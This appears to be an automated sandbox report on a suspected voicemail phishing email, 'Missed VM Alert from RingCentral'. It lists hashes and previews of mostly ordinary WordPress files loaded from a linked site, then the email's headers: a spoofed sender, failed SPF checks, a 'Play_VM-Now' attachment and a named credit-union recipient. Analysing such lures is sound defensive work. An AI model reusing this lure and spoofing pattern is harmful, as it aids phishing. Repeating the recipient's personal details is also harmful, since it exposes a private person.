        SHA-512:743825EAEA11208277528E506C115EC786AB060095AE4250C65A9B02FE9E5CB2AC5AC386532486A2678B9615490CE75BA096A9FD2041200989AD07A726B5D9D0
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2
        Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65447)
        Category:downloaded
        Size (bytes):87553
        Entropy (8bit):5.262620498676155
        Encrypted:false
        SSDEEP:
        MD5:826EB77E86B02AB7724FE3D0141FF87C
        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.99763503542357
        Encrypted:true
        SSDEEP:
        MD5:61E2057608AAC48F26761D88143610C4
        SHA1:CCAE7F70640D979DAF36CF8BA3B30DFF6C082831
        SHA-256:D4FDB78D05D67402C21AD0782992C878F82EFFAB771035F21B1EC0F944905365
        SHA-512:11DCE22B7F196DDCC6B3D50E69CF5FD4D846DB852D7AE40A74D06B50590FE4A41AFEA371262B3946C0964249952B8A0D0499D3D921E234FF47926C7B7F27836E
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/11/demoreel.mp4?_=1:2f845ee6dada5c:3
        Preview:#..`...B...tY.l...e....l.....!].)...i....)....9./.?....1.Z...j..Q......a...AoNI..T..O[.7i<...{...!OZ..r.}dS.Z.......&.]_;..W.".+J_S .'O$..M?.M.........Y.......TQP...}..}..W...%zY..s8~.mw.D...t...oo...)...h.p_d..Mf..r..S.W......)8.6).T.6.[%.8.....G......G/......v%)m.%...$0F..w....u.b..K..R...n.G.3....r.J........t....^...*.N...s.Q...2g...}.a..U.._...F..j....*|.J#.I....&..I8.{.#..bb.....-.$fz.D#......wT.4#.8..C.ZL.L./s6D..Y......h...7...3.>.%o@./^N.&u._N`..B..j...{..(q...]?...s...K.fG@..vJ!....DsM..>.._.3.....L.I.H.._A.F...P.?7Y...._ ....v..o...)B..D...;...?.P....I^k,..K........,...5.Z......DH6;..........9..M...N.#>..yD.iq...@.}l=...N....7...+...&L...U.:.h....)T.w...~.K.d.}...od\*....".\.<G........\HhYR\.68......V(.J.'.Q.@.E\.e..r...`t....J}......5.%.^...`...L...@.....]^Y.nL'..).OL}h.w...i..B..S..~*@...7......kf...T%..'..U...r+.h.mZ.ka...L..s.~r..u3..n..."..8.P....N..L.\J|K%....m$._vs9..#.L.<.D=.g..e...........c.h.OS,.:@....O....K..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Web Open Font Format (Version 2), TrueType, length 31052, version 1.0
        Category:downloaded
        Size (bytes):31052
        Entropy (8bit):7.994212302026679
        Encrypted:true
        SSDEEP:
        MD5:5C4F357D4926FC197D43ABC63B7FCA8C
        SHA1:686AF7000D038D7479ED36B48A8EBB0EA9B98AEA
        SHA-256:1393ACC632C160DEF86B45C2521C8EE742B7E6239D0D90FB95F51D55CF48B9C3
        SHA-512:9F760F0C8C7FE583BBCB8270ABF62C826D33FA6DCEAF820533B64B56742284EC9B750066DAAF9E4D3C0305373D1DB8BD2AD47BBB88573610F0BE2A617E183DD6
        Malicious:false
        Reputation:unknown
        URL:https://fonts.gstatic.com/s/nunitosans/v15/pe0TMImSLYBIv1o4X1M8ce2xCx3yop4tQpF_MeTm0lfGWVpNn64CL7U8upHZIbMV51Q42ptCp7t1R-s.woff2
        Preview:wOF2......yL.......@..x...........................u...v...?HVAR.$?MVARb.`?STAT.z'2..2/d.....0.}..N.0..>.6.$.... ...../...I.5l...[..0....q..=7v0..U..@......X..OI.?d,>...nK...I#.".J+...3..kF.s.....>U.s..C..W.U.C..%`e....Y.a..5.{.1...z.......)8....K...p0..Zh.r..J...). .. .......G...]..-^T.z3.....s_Df...Ru....k.+r%2.......[.%.F.Z..?.4....h......P.....%..j.....Y...1.4i.Z.5/.....<...Jw....h:....5.J-.K.&..rqo...SK...2>..0s.l........g........_e..m...D..'...~.q.w.)C,A...A.@....{....4J.#.k.c....G.?.n.=...E......W..]].e..(...[.~...EI.VX....<Hx2`[z...I..z}@)..............,rD.......2.......z.R..t.$;.$.'....<nV.|....~&A.!...Q...+&...M]........W.0-.<........Ig.+..g..=.....".+..8.d.d..-...O...d<.W*/.H$R.D"...|.....L...).9{./...c(0....oj..xx.^^.nN........*..R....c..-.....FK..|...',.|..T.N......2...i.,....s..t.*.Z......u..>.e..<....!s..~U....@.$.04..T.j.fL..wA.(6A.l......^."..BI$.....(l..M.l..D'_...f...HA.Qv.6~k.....y....V.#:....{.H:...+...t..d..X.Ty).p..m.../..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 742 x 153, 8-bit gray+alpha, non-interlaced
        Category:downloaded
        Size (bytes):10201
        Entropy (8bit):7.951172281418795
        Encrypted:false
        SSDEEP:
        MD5:266E56BC38B6C9B088B1E1C7848B5D27
        SHA1:CC5729BC65B174023133A0F45B7EBDB10F56BFAB
        SHA-256:B1C16D7CA6C8E2434553CB1FB52833652B42866EC4BDE84AC7B3F8583770587F
        SHA-512:B28B4F122C9D45A3D9673208096F0750F122D70B47D06EA5828A916E70BCE34D015D794ACBD1A2FC777AF1C2A28241623C383B6911117203060B6FA0C69D0CF1
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/05/cropped-studiomvsw.png
        Preview:.PNG........IHDR..............{7...'.IDATx..w..E..O...# ..A..L..TD..0b\....vQYu.[....i.....]...FT...TL q.!.....{.vWWUW...{|...twuuu..OW....+H......E...$.9\ZC$..".V.R..[Z#..'p.Y.N..MD"Q.j.V...G..d.zK..D.\.9.\p..r..,m#..r...(..dGi..H..0...A.0..Dy..:..H...E"Q.........s.H.G0.s87...\$.......@.0..Dy..:..P.W..E"Q....q...e,.g......d)..)./..\,.,".(.a.C .V...5 ..=.(.....E"Q..|x..- .kA.;....F`......8'.WY..\.r...S?....s.H./0...)......y..3P^.gS~.c..\$.....x...S.8..y..Nk.&.s.H.G0...0..w...<..G... 0..D....5.i.....(....s.H.g0.....).P....s.H..0.t.y.ss...<....".(.`..K...6 .Fy....E"Q>.<.....@......D.<.y.7.i..<.....0..D...`w..8.....G.0..Dy..........]@........s.H..0Ou..S.....Y......\..._.0..Dy...........]A.Cy./...D...y.7.}...<..\`........6q...z..|..\$..3.C.y..<..#Q....s.H..0.y.l.<..P....s.H..0.x...<>..P....s.H..0.{.l....Q.....".(.a........P.....".(.a..../...<...E"Q..<...?...<...E"Q..<...O.......E"Q!.<...y(...2{........\`......&.<..5 .......c...."..0`n...q....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65266)
        Category:dropped
        Size (bytes):158005
        Entropy (8bit):5.284310833637965
        Encrypted:false
        SSDEEP:
        MD5:E53EC3D6E21BE78115810135F5E956FE
        SHA1:523892839B88351523E0498BA881C4431197B54E
        SHA-256:B15C3EA03D50C2430490E7416733A254FEEA4237BB60B54181BD3473EBE4149F
        SHA-512:84B080EAAA043928F038421CEB18BBA7483AFEE5B6480A92EE01992317CDE2361A6DD255B16EC036E51E8A1FEF46B5379C6A5FF5C9EC69D682F96DEAA03A8842
        Malicious:false
        Reputation:unknown
        Preview:/*!. * MediaElement.js. * http://www.mediaelementjs.com/. *. * Wrapper that mimics native HTML5 MediaElement (audio and video). * using a variety of technologies (pure JavaScript, Flash, iframe). *. * Copyright 2010-2017, John Dyer (http://j.hn/). * License: MIT. *. */.!function r(a,s,l){function d(n,e){if(!s[n]){if(!a[n]){var t="function"==typeof require&&require;if(!e&&t)return t(n,!0);if(u)return u(n,!0);var o=new Error("Cannot find module '"+n+"'");throw o.code="MODULE_NOT_FOUND",o}var i=s[n]={exports:{}};a[n][0].call(i.exports,function(e){var t=a[n][1][e];return d(t||e)},i,i.exports,r,a,s,l)}return s[n].exports}for(var u="function"==typeof require&&require,e=0;e<l.length;e++)d(l[e]);return d}({1:[function(e,t,n){},{}],2:[function(i,r,e){(function(e){var t,n=void 0!==e?e:"undefined"!=typeof window?window:{},o=i(1);"undefined"!=typeof document?t=document:(t=n["__GLOBAL_DOCUMENT_CACHE@4"])||(t=n["__GLOBAL_DOCUMENT_CACHE@4"]=o),r.exports=t}).call(this,"undefined"!=typeof global?global
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with very long lines (1107), with no line terminators
        Category:downloaded
        Size (bytes):1107
        Entropy (8bit):5.064499259121075
        Encrypted:false
        SSDEEP:
        MD5:8A5C9689AE636C452B6808740BA04136
        SHA1:8D2C85D7779D00C12AEB6B55A99443952D9A144E
        SHA-256:79CB399203843F65199BEC32BC4ABAC5DFD20F141D3E4EC1424BF00C7108FA45
        SHA-512:A80491B5C34E4719B042D1EF0DC8CFF0E2AD29343AC8926A3CAB36202B02DC360000B430B3141E474FE08BFFC54329EB47082D530AF6B44727490C4CD0F0ED0C
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=6.6.2
        Preview:!function(e,n){e.wp=e.wp||{},e.wp.mediaelement=new function(){var t={};return{initialize:function(){var e=[];(t="undefined"!=typeof _wpmejsSettings?n.extend(!0,{},_wpmejsSettings):t).classPrefix="mejs-",t.success=t.success||function(e){var t,n;e.rendererName&&-1!==e.rendererName.indexOf("flash")&&(t=e.attributes.autoplay&&"false"!==e.attributes.autoplay,n=e.attributes.loop&&"false"!==e.attributes.loop,t&&e.addEventListener("canplay",function(){e.play()},!1),n)&&e.addEventListener("ended",function(){e.play()},!1)},t.customError=function(e,t){if(-1!==e.rendererName.indexOf("flash")||-1!==e.rendererName.indexOf("flv"))return'<a href="'+t.src+'">'+mejsL10n.strings["mejs.download-file"]+"</a>"},void 0!==t.videoShortcodeLibrary&&"mediaelement"!==t.videoShortcodeLibrary||e.push(".wp-video-shortcode"),void 0!==t.audioShortcodeLibrary&&"mediaelement"!==t.audioShortcodeLibrary||e.push(".wp-audio-shortcode"),e.length&&n(e.join(", ")).not(".mejs-container").filter(function(){return!n(this).parent(
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
        Category:downloaded
        Size (bytes):85661
        Entropy (8bit):4.955843633950119
        Encrypted:false
        SSDEEP:
        MD5:B7F6AE6DBED41C4D1F714B27C3B505C3
        SHA1:CDA785B9DD38A52BAD8A74E2C1E6C9A0C2087D8E
        SHA-256:5023D81CF7946ED0D3F1271E5FC1D583D77A75EF2CEB28450C2B22B8D56E9059
        SHA-512:5968FE4F5BA0D8C9323BBCE5C7063629C3BD4A08D17D5A9CB44467ECC87E4C635636C5FDE898C99DD06303B36B89E2F7DBE66B436830F5C5228254747CE41CBF
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-includes/css/dist/components/style.min.css?ver=6.6.2
        Preview:@charset "UTF-8";:root{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33,69,230;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:24,58,214;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.components-animate__appear{animation:components-animate__appear-animation .1s cubic-bezier(0,0,.2,1) 0s;animation-fill-mode:forwards}@media (prefers-reduced-motion:reduce){.components-animate__appear{animation-delay:0s;animation-duration:1ms}}.components-animate__appear.is-from-top,.components-animate__appear.is-from-top.is-from-left{transform-origin:top left}.components-animate__appear.is-from-top.is-from-right{transform-origin:top right}.components-animate__appear.is-from-bottom,.components-animate__appear.is-from-bottom.is-from-left{transform-origin:bottom left}.components-animate__appear.is-from-bottom.is-from
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (2065), with CRLF line terminators
        Category:dropped
        Size (bytes):2217
        Entropy (8bit):4.987563955657868
        Encrypted:false
        SSDEEP:
        MD5:5CF7DA1041C9CD5D6FD7240C5A8D7E27
        SHA1:A0FF7E5C9D198ECE17E940D2E524AF990F5BEA5B
        SHA-256:A258FA2108C7A4579876F75154378F19E3EE8AF7753499BAD8BFB18B56CB6DFC
        SHA-512:67D954F132F300E5BC4D456E4F4EFCD868BD244160F5169D7ED10D7A1FF5454520F030DC869873294AB574FCCD099565952DB4192102840BA664FE88B78AE352
        Malicious:false
        Reputation:unknown
        Preview:/**.. * jQuery.browser.mobile (http://detectmobilebrowser.com/).. *.. * jQuery.browser.mobile will be true if the browser is a mobile device.. *.. **/..(function(a){(jQuery.browser=jQuery.browser||{}).mobile=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (7353), with CRLF line terminators
        Category:downloaded
        Size (bytes):7529
        Entropy (8bit):5.1546762241823565
        Encrypted:false
        SSDEEP:
        MD5:EACDE944439C31E08B8016A0D4C0473F
        SHA1:342D89006E945BF989E7E69CD6883D57715C22D8
        SHA-256:D2395CFB0A07C27A145F3C0279AAB130CD0A80453416B92328144D99C8213743
        SHA-512:10944511816E1D62F120665AA00843C5AF3F7831253DD0223C38DEF67007CA557BE6AFA297B99AEC5B2AFE8B9F28CE743C26CBA4DD4BECB4B72DBA4DA8DFB9A5
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/sticky-menu-or-anything-on-scroll/assets/js/jq-sticky-anything.min.js?ver=2.1.1
        Preview:/**..* @preserve Sticky Anything 2.22 | (c) WebFactory Ltd | GPL2 Licensed..*/....var stickyAnythingBreakpoint = '' // solely to use as a debugging breakpoint, if needed.....!function(e){function t(t,i){e(".sticky-element-original").clone().insertAfter(e(".sticky-element-original")).addClass("sticky-element-cloned").removeClass("element-is-not-sticky").addClass("element-is-sticky").css("position","fixed").css("top",t+"px").css("margin-left","0").css("z-index",i).removeClass("sticky-element-original").hide()}e.fn.stickThis=function(i){var n,s=e.extend({top:0,minscreenwidth:0,maxscreenwidth:99999,zindex:1,legacymode:!1,dynamicmode:!1,debugmode:!1,pushup:"",adminbar:!1},i),l=e(this).length,r=e(s.pushup).length;return r<1?(1==s.debugmode&&s.pushup&&console.error('STICKY ANYTHING DEBUG: There are no elements with the selector/class/ID you selected for the Push-up element ("'+s.pushup+'").'),s.pushup=""):r>1&&(1==s.debugmode&&console.error("STICKY ANYTHING DEBUG: There are "+r+' elements on
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ISO Media, MP4 v2 [ISO 14496-14]
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.999078636959081
        Encrypted:true
        SSDEEP:
        MD5:7621E32CF428A84637B53136453A03FA
        SHA1:817E75D15DA1A79221CAC0DF90ACF00EB2D636DD
        SHA-256:B089CF3ADCEF3844C9719D04C6577CE65CE859FD7E61A1978EE1400FB31E3E93
        SHA-512:0326094C7C7C01F596BB134F78E54EACEDAFDFDA4764E0DAD5B8819A1D4AA17E5FDC6624B97B479AFF1431632291B447CA92DDEF8CF1B0E0A30F3F7B6AF27A3E
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/11/demoreel.mp4?_=1:2f845ee6dada5c:0
        Preview:....ftypmp42....mp42....free...fmdat............libfaac 1.28..B.. .2.G! I....#.....e.....b._2...x...<$...<eC3......@.s2..............>YXVzU..ig.i.V..D.L.<p..#...2...z&......:.F...g.....xV.H ...UA..}`'<.>....d:..&s.`..;.+...LAL..X...)BM.8...dr...Qk......=..A.v ...|.p9.;.fkk...(...O.X....<.F..K..(.>K.'w ....C.:.V.w,*.l0".:.Q#;..MI.J..7. 4....G.........>.w\!..Kl.....J^.9.\"....]...A2...c.Nbk..C7W.k../...Z....'$...C...I..F..#nWX...g..1./.d.u>.r..z....>.BI..,...#1..m....k.....I....W'z.Y.9}J|"..}....%TT...[....#.....G.Pl..P.Y.!...Ox:i.Q.80R...i&q...3......XE..{...X....s..=..NL6.{.../X.[.BF+...)...F.=....R...GQh...q.).....S...5........ .....N...0.V..5......:..l9.w..}-=Z..k.......&.8..5...*.:...x....>bM._..jq1....jdn..w4...z.O9.e..(.w_..|...^.G0<..V@.i.%(.....e.&9.t......!..(..\P=...6......+...v...h|..Y....o.:h.+...D.}-..).~..s..m3....-....d....G...-.......&g.h+..."&=.....i...../...K..a./O&..gj{...>H*.|s....e...'...b..?H..T....|oQ,&(,.RvY..5O.....K
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):2472
        Entropy (8bit):7.906887193573058
        Encrypted:false
        SSDEEP:
        MD5:D175532BFEE3A3AB617BEE6FAC4D38E3
        SHA1:989E80645089870C060EA0B282428CE6AECAB4D9
        SHA-256:39BE225A239D80A3472C7AD0C9B302D675217C5ABBBB22C4A88D1EC54945C27B
        SHA-512:A745F1A27F2520B11345853361260BA636D5CD7095AC60E7C97DE1080EF2EEE6EC6192E4174BB8D5487594C90A086EEE557D78BE4F4031AD49CBC7C1A5AABF9F
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/05/cropped-icono-32x32.png
        Preview:.PNG........IHDR... ... .....szz....oIDATX.}..o].q..3{.sy)....%.R.[.Z....X...M..D.. ..`.j..n].(.W...S..).6E.."%'...SKu...h.r%.6y)...}y....sH.E...p^.Yk.Y.G...e...=........j.....!.P.x.J..._.y......z....{t.T.P....{.=.`j..j....hD$".q....*.*.%.!.D"JD..........2.SP@..Cd'..H...#C.E..!y..`.K..b......G..dt.1.#V...s...........DT.,w..!.<...".A..K..K....Y. ..C.......Y.x.G..c.....!R.u...A.....(...y.D.xi....J..?.9w.>...cB7x41.%.X.......&7...|...S...C,....C....z.!1.X..)kwz|..2../...u.My......J/.(.o...?.<..}_..6fgiL......s.%....#.s}.h..l.v.u..._~Le...M..y..*#e.......Rv..Y...^].P..@a....n.201..i.c.>N..3....-.h....w......?2.gO....>..'i_.N.._f......mR..w...'j.DJC..>^..|..S'Y....(..SbA.......^..<2..g......W>b~.......t.........X....&=6P.-.k...C_....y.. ..<...4k...j.fB..*..?........z.4..=Mi.QV..1?5...H...qc...'.$.K...4....!.wmbL..S..P...:Ko.......dW...(+./.v.2.Q.=w...(....g?`q.e.|....:./...:.j....]-.....O.MP#....!..z.......Vc...8....KX..=z.C......A.0.ac...S.p.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (8897), with no line terminators
        Category:downloaded
        Size (bytes):8897
        Entropy (8bit):5.102763700159927
        Encrypted:false
        SSDEEP:
        MD5:9A8719CDCD077F3D6030FE6FA52D3766
        SHA1:77143C99E39E1078A99D1E27119870449247F512
        SHA-256:306244949E62140DA69F30045493D14A19E6967DB8797CD5DE5B7688637D1F47
        SHA-512:8F4767DE2F260D66BBF55A9DDDD930B5100F7F29F8A8A6E74E0EC72DCEB40F78B99434CB7541F566F7B9688B8F536A0396BC9BB9231C49266C63C842A84B31A0
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/themes/go/dist/js/frontend.min.js?ver=1.8.11
        Preview:(()=>{"use strict";const e=(e,t,n)=>{let s;return function(){const o=arguments,a=this,r=()=>{s=null,n||e.apply(a,o)},i=n&&!s;clearTimeout(s),s=setTimeout(r,t),i&&e.apply(a,o)}};function t(e){if(["Space","Enter","Tab"].includes[e.code]||!document.querySelector("body").classList.contains("menu-is-open"))return;const t=document.querySelector(":focus"),n=e.shiftKey&&"Tab"===e.code;if("nav-toggle"===t.getAttribute("id")){if(n)return;setTimeout((function(){document.querySelectorAll("ul.primary-menu li:first-child a")[0].focus()}),10)}}!function(){function t(e){var t=window.getComputedStyle(document.body,":before").getPropertyValue("content");if(t&&-1!==t.indexOf(e))return!0}"object"!=typeof window.TenUp&&(window.TenUp={}),TenUp.navigation=function(n,s){var o,a={target:"#primary-nav",toggle:"#js-menu-toggle",sub_menu_open:"hover"};for(o=0;o<a.length;o+=1)void 0===n[o]&&(n[o]=a[o]);var r=document.querySelector(n.target);if(r){var i,u,c,l=r.getAttribute("id"),d=document.querySelector(n.toggle),
        File type:ASCII text, with very long lines (1113), with CRLF line terminators
        Entropy (8bit):5.983866028143196
        TrID:
          File name:Missed VM Alert from RingCentral.eml
          File size:9'682 bytes
          MD5:e1f6cfea13c6d9270d3f15b26c628f94
          SHA1:200a9ae8a3adaf7717319f79145bb0929fad4ceb
          SHA256:f51bed56eb3c649ab2654bcd66d2302de92f0d14276a318e21a062ab2fec5b99
          SHA512:30ae870791c094c4a21c3a8a977b28374e23660a8527bc62f2c72c179e274b9d8a77e89990e2f56c016bdbdcce6dd54fa4ca717eb4c570b1025e1b05c0291292
          SSDEEP:192:bJjUXEVn/zfQUWbAJwqZpWa7pzNJ/RV+BvATUV2qCAzFkhnHJs7Vgm00:bJIXacZOBr9NbaoTG+WVh
          TLSH:7512296176942C247BC291C66612FD0163E3B1C2C9B7D9906EEFC08A26D70B99317B9F
          File Content Preview:Arc-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=v5jbWR1ue9DFBbkcDIsnSpl+RrU66lzfpK9JWj9Tw3yrEnY5tvCdkP9/ZXYwf/wPV2DREHTmlgNBtgjUTyrpx4Lud/qs5Oyj4Qqer+1y/jf506N59hvC4vZZ+thMdOSefw+4ETfpDWPo1nz+uBgtLVHk3w/cuLOqRd3hx67oM/51aN31
          Subject:Missed VM Alert from RingCentral
          From:RingCentral Call Service 3ad0e3d88e10b96c151ffc942a587798 vm 3ad0e3d88e10b96c151ffc942a587798 <casey@ccrps.co.uk>
          To:Barry Doan <Barry.Doan@firstontario.com>
          Cc:
          BCC:
          Date:Wed, 16 Oct 2024 19:33:37 +0000
          Communications:
            Attachments:
            • Play_VM-Now
            Key Value
            Arc-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=UFzbQpiAvrorG9LAnw8tBLGsRuQNgMB23UNPpA/mb0hY52CIe9TPQ+toOExJw0Xv8QNEPNPYJZhnXztnhq8gimiTEpQQJgUxRGP6/L890SwLglTG40i3VkywmgxI1ffwbob/wB11i0KsFrHB+yLCsNUAX/dGNdF9UW/JHJyEo0TLm9tYyiUcOMJnMv3psc95AUUeCGG14ZuZvX0MjeSB0c2S7rr7H84vZe7iJeFwMzhBzl0hc1JKHd7/oqraqQER2yywF+gRtdxlPjrXh2md67dLT4sp9RiPrq6CdktVr420J+GKsIXgaTL5+DBshopkJTtUL1RxQyqj+myqiFBMYA==
            Arc-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=ikgHtZ00o/hkZCQVCD1WZws/+qpGRa65RjxpHaXTfm0=; b=C59XlyNcpGwOoesVxk/cbchdHDq3nfEbTUqSrRxHc5I+0xqOJQR2/h6n1i3RCSCZUhG48r6NXAtL0cDViMxS1Oagp58ov+oXG/TORBG2f2SE0cp3I1f56+Jse210Sa2L1eheGRoosu34ggf+8z03FuTUqKPtMrzmop7uUM62Eylwey1vPgl7WxUP4KbK52Ez+hLMy+UAS2nt8jwQnUXg7tVIljVATx7Y7vT/DiCHQRwWXLDclMa2IooqGy9m3R9YcXOOe6REVcYzbvNLbQl0ymCgpm/Mk3WTQv5d3TcewKUN8l7l0zFa1u62b4St20I0XuabFDltr5OhfG/SweO0dA==
            Arc-Authentication-Resultsi=1; mx.microsoft.com 1; spf=fail (sender ip is 185.161.211.105) smtp.rcpttodomain=firstontariocu.com smtp.mailfrom=ccrps.co.uk; dmarc=none action=none header.from=ccrps.co.uk; dkim=none (message not signed); arc=none (0)
            Receivedfrom [127.0.0.1] (185.161.211.105) by CW2PEPF000056BA.mail.protection.outlook.com (10.167.240.5) with Microsoft SMTP Server (version=TLS1_3, cipher=TLS_AES_256_GCM_SHA384) id 15.20.8069.17 via Frontend Transport; Wed, 16 Oct 2024 19:33:38 +0000
            Authentication-Resultsspf=pass (sender IP is 40.107.121.113) smtp.mailfrom=ccrps.co.uk; dkim=none (message not signed) header.d=none;dmarc=bestguesspass action=none header.from=ccrps.co.uk;
            Received-SpfFail (protection.outlook.com: domain of ccrps.co.uk does not designate 185.161.211.105 as permitted sender) receiver=protection.outlook.com; client-ip=185.161.211.105; helo=[127.0.0.1];
            X-Ms-Exchange-Authentication-Resultsspf=fail (sender IP is 185.161.211.105) smtp.mailfrom=ccrps.co.uk; dkim=none (message not signed) header.d=none;dmarc=none action=none header.from=ccrps.co.uk;
            Content-Typemultipart/mixed; boundary="----sinikael-?=_1-17291705136600.7712995850818414"
            Content-Transfer-Encoding7bit
            Content-Dispositionattachment
            FromRingCentral Call Service 3ad0e3d88e10b96c151ffc942a587798 vm 3ad0e3d88e10b96c151ffc942a587798 <casey@ccrps.co.uk>
            ToBarry Doan <Barry.Doan@firstontario.com>
            SubjectMissed VM Alert from RingCentral
            Message-Id<04b60435-77a3-f977-c6a2-1689464be5c0@ccrps.co.uk>
            DateWed, 16 Oct 2024 19:33:37 +0000
            MIME-Version1.0
            Return-Pathcasey@ccrps.co.uk
            X-Eopattributedmessage1
            X-Ms-Traffictypediagnostic CW2PEPF000056BA:EE_|LO3P123MB3179:EE_|YT2PEPF000001CA:EE_|YT1PR01MB9434:EE_
            X-Ms-Office365-Filtering-Correlation-Id ebe934d3-16e0-4d40-c41d-08dcee197053
            X-Ms-Exchange-Senderadcheck1
            X-Ms-Exchange-Antispam-Relay0
            X-Microsoft-Antispam-Untrusted BCL:0;ARA:13230040|376014|1800799024|36860700013|82310400026|2613699012;
